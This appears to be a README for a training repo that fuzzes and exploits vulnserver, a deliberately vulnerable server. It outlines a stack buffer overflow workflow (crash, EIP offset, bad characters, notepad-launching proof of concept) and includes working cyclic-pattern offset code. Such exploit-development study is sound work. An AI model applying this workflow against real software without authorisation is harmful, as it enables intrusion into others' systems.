This repo contains exploit scripts for the vulnserver application.

For the first attempt I used Atheris. See the `atheris` folder for the script and some verified crashes found by the fuzzer.
- Install Atheris: `pip install atheris==2.0.7`
- I used atheris in the past, that's why I chose it.
- Atheris is a bit pointless here, since there is no instrumentation to guide the fuzzer. It's just a dumb fuzzer.
- It feels a bit time-consuming to set up the connection each time and send the payload.
- Ideally fuzzing with instrumentation would be better?
Mostly derived from h0mbre's blog post. Contains the boofuzz script to identify the memory access violation using the TRUN command. The folder contains multiple scripts / steps to come up with a final PoC:

- `main.py`: the main script to fuzz the target and identify the crash.
- `exploit.py`: the script that triggers the crash using the string derived from the fuzzing.
- `identify_EIP.py`: the script to identify the EIP offset; it passes a unique string so we can get the offset of EIP.
- `verify_EIP_overflow.py`: the script to verify the EIP overflow using sequences of repeated chars to confirm all the offsets.
- `identify_bad_chars.py`: the script to identify the bad chars so that we can exclude them from the payload.
- `poc.py`: the proof of concept that exploits the target by launching a notepad session on the local machine each time it runs.
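As an added example (not one of the repo's scripts), this is the cyclic-pattern logic behind the `identify_EIP.py` and `verify_EIP_overflow.py` steps: generate the unique string, map the value the debugger shows in EIP back to an offset, and build the repeated-char payload that confirms it. The crash length and EIP value used at the bottom are constructed for illustration.

```python
"""Cyclic-pattern helpers for triaging a fuzzer-found overflow crash."""
import string

PATTERN_SPACE = 26 * 26 * 10 * 3  # bytes before the Aa0..Zz9 triplets would repeat


def pattern_create(length: int) -> bytes:
    """Build a pattern of non-repeating 3-byte triplets (Aa0Aa1...Aa9Ab0...).

    Every 4-byte window is unique, so any 4 bytes that land in EIP map back
    to exactly one offset in the sent string.
    """
    if length > PATTERN_SPACE:
        raise ValueError(f"length {length} exceeds unique pattern space {PATTERN_SPACE}")
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(pattern: bytes, eip: int) -> int:
    """Map the 32-bit EIP value read from the debugger back to an offset.

    x86 is little-endian, so the register shows the 4 pattern bytes reversed;
    convert the value back to bytes in little-endian order before searching.
    Returns -1 when the value is not in the pattern (the crash may not
    control EIP directly).
    """
    needle = eip.to_bytes(4, "little")
    return pattern.find(needle)


def build_verify_payload(offset: int, total_len: int) -> bytes:
    """Verification payload: 'A' filler up to the offset, 'BBBB' that should
    land exactly in EIP, then 'C' filler to keep the original crash length.
    EIP == 0x42424242 in the debugger confirms the offset."""
    if offset + 4 > total_len:
        raise ValueError("offset does not fit in the crash length")
    return b"A" * offset + b"BBBB" + b"C" * (total_len - offset - 4)


if __name__ == "__main__":
    # Constructed example: a 5000-byte pattern crashed the target and the
    # debugger showed EIP = 0x316A4130, i.e. the bytes '0Aj1' stored little-endian.
    pat = pattern_create(5000)
    off = pattern_offset(pat, 0x316A4130)
    print(f"EIP offset: {off}")  # 272
    print(build_verify_payload(off, 5000)[off - 2:off + 6])  # b'AABBBBCC'
```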
- Install Boofuzz: `pip install boofuzz`.
- I didn't know Boofuzz before; I read about it in h0mbre's blog post.
- Similar approach to the one above: just set up a connection and send the payload.
- Compile using: `clang++ -fsanitize=address,fuzzer -o vulnserver_fuzzer fuzzing_vulnserver.cpp`
- Run using: `vulnserver_fuzzer -fork=5 -ignore_crashes=1`
- Testing only `Function1`, `Function2` and `Function3`.
- Since we instrument the target, we get a reliable coverage metric.